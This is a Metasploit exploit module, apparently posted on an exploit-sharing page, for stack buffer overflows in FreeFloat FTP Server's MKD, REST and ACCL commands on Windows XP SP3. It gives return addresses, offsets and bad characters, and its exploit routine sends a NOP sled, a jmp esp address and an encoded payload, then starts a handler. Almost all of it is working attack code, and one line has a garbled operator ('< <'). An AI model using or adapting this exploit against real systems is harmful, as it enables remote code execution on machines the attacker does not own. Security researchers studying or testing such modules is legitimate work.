$Id: fftp_bof.rb 2011-09-01 20:14 KedAns-Dz $

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 Rank = GoodRanking

include Msf::Exploit::Remote::Ftp

def initialize(info = {})

 super(update_info(info,

 'Name' => 'FreeFloat FTP Server Multiple Remote Buffer Overflow Exploit',

 'Description' => %q{

 This module exploits a FreeFloat FTP Server Buffer Overflow

 found in the MKD/REST/ACCL command's.

 },

 'Author' => [

 'C4SS!0 G0M3S', # Discovery Vuln.

 'KedAns-Dz' # Metasploit Module

 ],

 'License' => MSF_LICENSE,

 'Version' => '$Revision: 0.1',

 'References' =>

 [

 [ 'URL', 'http://www.exploit-db.com/exploits/17539' ],

 [ 'URL', 'http://www.exploit-db.com/exploits/17546' ],

 [ 'URL', 'http://www.exploit-db.com/exploits/17550' ], # by mortis

 ],

 'DefaultOptions' =>

 {

 'EXITFUNC' => 'process',

 },

 'Payload' =>

 {

 'BadChars' => "\x00\x0a\x0d",

 },

 'Platform' => 'win',

 'Targets' =>

 [

 [ 'FreeFloat FTP Server (Windows XP-SP3 / REST command)',

 {

 'Ret' => 0x7C874413, # jmp esp - (KERNEL32.DLL)

 'Offset' => 246,

 'CMD' => 'REST'

 }

 ],

 [ 'FreeFloat FTP Server (Windows XP-SP3 / MKD command)',

 {

 'Ret' => 0x7cb97475, # jmp esp - (SHELL32.DLL)

 'Offset' => 247,

 'CMD' => 'MKD'

 }

 ],

 [ 'FreeFloat FTP Server (Windows XP-SP3 / ACCL command)',

 {

 'Ret' => 0x7C874413, # jmp esp - (KERNEL32.DLL)

 'Offset' => 246,

 'CMD' => 'ACCL'

 }

 ],

 ],

 'DefaultTarget' => 1))

 end

def exploit

 connect_login

print_status("Trying target #{target.name}...")

buf = make_nops(target['Offset']) + [target.ret].pack('V')

 buf < < make_nops(20)

 buf << payload.encoded

send_cmd( [target['CMD'], buf] , false )

handler

 disconnect

 end

end

Comments
Write a Comment